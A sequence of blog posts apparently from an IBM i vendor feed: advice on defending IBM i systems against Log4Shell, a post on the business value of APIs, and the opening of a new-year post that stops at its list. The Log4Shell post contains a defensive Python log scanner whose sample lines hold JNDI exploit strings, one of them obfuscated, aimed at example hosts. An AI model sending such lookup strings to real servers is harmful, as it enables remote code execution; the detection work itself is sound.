Keeping Your IBM i Safe in the Face of Attacks Like Log4Shell

The old saying “The Price of Liberty is Eternal Vigilance” can be updated today to read “The Price of Online Access is Eternal Vigilance”. We just got hit over the head with a reminder of the importance of eternal vigilance with the discovery of the Log4j Java security vulnerability. For the last several years, millions of applications using Java and the Log4j logging component have been vulnerable to attack. Malicious users can use that vulnerability to extract data from targeted systems, load and execute malware on those systems and even completely take over the servers. The vulnerability is so severe and widespread that it has received a rating of 10 on the 1-10 Common Vulnerability Scoring System (CVSS) scale from the Apache Software Foundation.

The good news is the software patches and remediation guides to eliminate this vulnerability are readily available (see links below for a start). But even if you are not a Java user, this problem is an important wakeup call.

In the IBM i world, we have often relied on “security through obscurity” – we think maybe we are safe because we are not huge targets like Microsoft and Unix/Linux. Or, we feel safe because we do not connect our IBM i systems directly to the internet. Unfortunately, attacks like Log4Shell can pierce those safety nets. If your IBM i happens to be on the same network as a machine that is vulnerable and connected to the internet, the Log4j vulnerability could be used to discover IBM i credentials and to access the IBM i.

To reduce your risk and keep your systems safe, you need multiple layers of protection. Some of the steps you can take:

Eliminate the use of Basic Authentication (in which user credentials that grant native access to the IBM i are passed in API calls). Replace it with encrypted token authentication.
Add third party authentication via technologies like OAuth.
Restrict APIs and other methods of access to just the minimum number of resources necessary to accomplish assigned tasks.
Add multifactor authentication to all access (including 5250 emulator access).
Be careful when providing the ability for programs on your internal systems to call out to outside systems. Calling out provides an opportunity for a hacker to get malicious code on your machine. For example, the Log4Shell vulnerability requires the ability to call out to the potential hacker’s system to do its damage.
Set up logging and monitoring of APIs and other kinds of outside access to your systems.
Check out the guides provided by your vendors (e.g. Microsoft, Google, IBM, etc. – see below) to learn more about protecting your systems.
Take good care of your security people who have the very difficult (and often thankless) job of keeping your systems safe.
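As an added example (not from the original post or from Eradani), a small Python log review that applies two of the steps above to constructed API access-log lines: it flags calls that still use Basic Authentication and calls carrying Log4Shell-style lookup strings, including the case and default-value wrappers that Log4j 2 unwraps before the outer lookup. The log format, the sample lines and the field layout are assumptions.

```python
import base64
import re
# Constructed sample API access log lines (not real traffic). Assumed format:
# <client> "<method> <path>" <status> "<User-Agent>" "<Authorization header>"
SAMPLE_LOG = """\
10.0.0.5 "GET /api/orders/123" 200 "curl/7.79" "Bearer eyJhbGciOiJSUzI1NiJ9.x.y"
10.0.0.9 "GET /api/orders/124" 200 "Mozilla/5.0" "Basic QURNSU46c2VjcmV0"
10.0.0.7 "GET /api/items" 404 "${jndi:ldap://198.51.100.7/a}" "-"
10.0.0.8 "GET /api/items" 200 "${${lower:j}ndi:rmi://203.0.113.4/x}" "Basic dXNlcjpwdw=="
"""
LINE_RE = re.compile(r'^(\S+) "([A-Z]+) (\S+)" (\d{3}) "([^"]*)" "([^"]*)"$')
JNDI_RE = re.compile(r'\$\{jndi:', re.IGNORECASE)
# Wrappers Log4j 2 evaluates before the outer lookup; collapsing them first lets the
# plain ${jndi: check also see ${${lower:j}ndi:...} and ${${::-j}ndi:...} spellings.
CASE_RE = re.compile(r'\$\{(lower|upper):([^{}]*)\}', re.IGNORECASE)
DEFAULT_RE = re.compile(r'\$\{[^{}]*:-([^{}]*)\}')

def normalize_lookup(value):
    """Repeatedly collapse case and default-value wrappers until nothing changes."""
    prev = None
    while prev != value:
        prev = value
        value = CASE_RE.sub(lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
                            else m.group(2).upper(), value)
        value = DEFAULT_RE.sub(lambda m: m.group(1), value)
    return value

def basic_auth_user(auth):
    """Name the account whose password is travelling in a Basic header."""
    try:
        raw = base64.b64decode(auth.split(" ", 1)[1], validate=True).decode("utf-8", "replace")
    except (ValueError, IndexError):
        return "<undecodable>"
    return raw.split(":", 1)[0]

def analyze_log(text):
    """One finding per problem: a Basic Auth call, or a Log4Shell-style lookup string."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, _method, path, _status, user_agent, auth = m.groups()
        if auth.startswith("Basic "):
            findings.append({"client": client, "kind": "basic_auth", "detail": basic_auth_user(auth)})
        for field, value in (("user_agent", user_agent), ("path", path)):
            if JNDI_RE.search(normalize_lookup(value)):
                findings.append({"client": client, "kind": "jndi_lookup", "detail": field})
    return findings
```

Running `analyze_log(SAMPLE_LOG)` yields four findings: two Basic Auth calls (accounts ADMIN and user) and two lookup strings in the User-Agent field, the second of which is only caught because the wrapper was collapsed first.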

The value provided by the interconnections of our systems is incalculable. It makes our modern way of life possible. Yet, that same interconnectedness is what creates the potential risks we face. As IT professionals, it is critical for us to remain “eternally vigilant” to protect our online liberty (and the precious data of our company and our customers).

To get the latest version of Log4j with the security patches: https://logging.apache.org/log4j/2.x/download.html

Microsoft’s Log4Shell remediation document: https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/

The IBM i Rochester lab’s guidance by Jesse Gorzinski: https://techchannel.com/Trends/12/2021/log4shell-part-1


The post Keeping Your IBM i Safe in the Face of Attacks Like Log4Shell appeared first on Eradani.

Top Five Ways APIs Can (and Will) Transform Your Business: Finding the ROI in API investments

I spoke recently with an IBM i Engineer who had become frustrated with the difficulty she was having in getting her business executives to understand the value of investing in APIs for their IBM i applications. She was looking for help in how to show the business return on investment from APIs. Together, we were able to identify several areas in which APIs would generate significant business value. When she showed the list to the executives, the light bulbs suddenly went on. They started coming to her practically every day with ideas about how to improve the business with APIs.

Much of the value of APIs comes from their ability to make it easy to integrate applications across systems, technologies and between enterprises. Here are some of the top ways APIs are providing IBM i customers with significant business value.


Increasing Revenue

By creating simple ways of connecting systems, APIs have helped IBM i users create new channels for generating revenue.

We worked with an insurance company that created a portal to their quoting system that allowed a real estate company to provide real time insurance quotes to customers looking at their properties.
A transportation company API-enabled their quoting system, making it possible for them to rapidly respond to over a million quote requests per day.
Several of our customers are now listing their products on ecommerce sites like Amazon, eBay and Shopify using APIs to keep inventory and pricing information continuously up-to-date.

Once the APIs were up and running, the ROI became clear based on the increase in revenue coming from these new channels.

IBM i companies that have started doing business via APIs have also found that the rapid response and access to real time data their APIs provide their customers increase customer loyalty and repeat business, which is another source of increased revenue.


Reducing Costs

We are working with several IBM i users that are reducing costs by eliminating manual processes from their business workflows using APIs. One company was receiving POs from their customers via email and then manually entering them into their order entry system. Now the POs come in electronically via an API and are automatically entered into the order entry system. The order entry system then returns an acknowledgement to the customer via an API and schedules the picking and packing of the order via yet another API. Another company needed to update inventory and pricing information on their Shopify eCommerce site. They were doing it with a daily file transfer, which meant that the inventory and pricing was often out of date. This led to a complex reconciliation process at the end of every day. Now they provide the inventory and pricing data in real time via an API. They have completely eliminated the manual effort involved in reconciliation.

API enablement can also help reduce new employee onboarding costs by simplifying operations. We worked with a company that had a very seasonal business. They had to bring on scores of temporary workers to staff their customer service department during their busy season. It took two weeks to train the new workers because they had to navigate through a variety of applications to respond to customer calls. They API-enabled each of the back-end applications so they could present all of the data on a single graphical screen. Now training takes half a day instead of two weeks. It’s a recurring ROI that dwarfs the investment they made in APIs.


Increasing Programmer Productivity

Every IBM i development shop I speak to has way more work in their backlog than they have time to address. Using APIs opens up the world of open source modules for delivering on some of those backlog items. Do you need graphical dashboards for data visualization? There are open source modules for that. Do you want an easy way to print mailing labels, bar codes and QR codes? There are other modules built specifically for that purpose. We were on the phone with a customer recently and they said they needed to verify banking (ACH) info before entering it into their system. We did a quick search and in seconds we found several popular open source modules that already do that. When adding a new feature, you no longer need to ask “how do we build this?”; rather, you can ask “has someone already built this?”

The ROI for using open source modules comes both from the direct savings in programming costs and also from the benefit of getting valuable features more quickly.


Simplify Staffing

By opening up your RPG and COBOL applications to APIs, you can start extending those applications using new languages like Java, JavaScript, Python, PHP, C# and others. There are millions of skilled programmers available who work in those languages. Meanwhile, universities, tech schools and online academies are turning out more every day. You no longer need to worry about whether you will be able to find people with the skills you need to maintain your applications. The ROI of ensuring a strong pipeline of engineers to maintain your applications can be that you will not need to go through an expensive and highly risky rip and replace effort if you can no longer find the people you need.


Future Proofing Your Business

When you have an API layer around your applications, you are free to add whatever technology emerges to your application stack. We worked with one company that has provided mobile devices to their salespeople and to their warehouse workers so they have real time, anywhere, anytime online access to their applications. Another is transmitting RFID code information from shipping containers and trailers to their IBM i so they know the location of those assets at all times. Other customers are connecting their IBM i applications to machine learning engines like IBM Watson and Google’s TensorFlow. A well-designed API infrastructure will allow you to stay out in front of the technology curve. The ROI of being able to keep up with technological change is practically unlimited.

These are just a few of the ways IBM i users are transforming their businesses with APIs. In each case, the returns on investment have been significant. We consistently see that once a company begins to use APIs, they rapidly expand their API inventory as more and more opportunities appear. If you or your executives would like to discuss the potential of APIs for your IBM i environment with experts who spend all of their time working with IBM i APIs, contact us at [email protected] or through our website at www.eradani.com. We look forward to speaking with you!


The post Top Five Ways APIs Can (and Will) Transform Your Business: Finding the ROI in API investments appeared first on Eradani.

Happy New Year, 2022!

Last year was blighted by the COVID pandemic again. I am sure all of us are glad to see another year dominated by the virus behind us. I am keeping my fingers crossed that we might start returning to a more “normal” life this year.

Despite all the restrictions upon our working lives, IBM still managed to bring us a new Power server series, Power 10, starting with the E1080 server, as well as two Technology Refreshes. You can read about it all on this website.

Every year I look to see what were the most read posts of the year. These were:
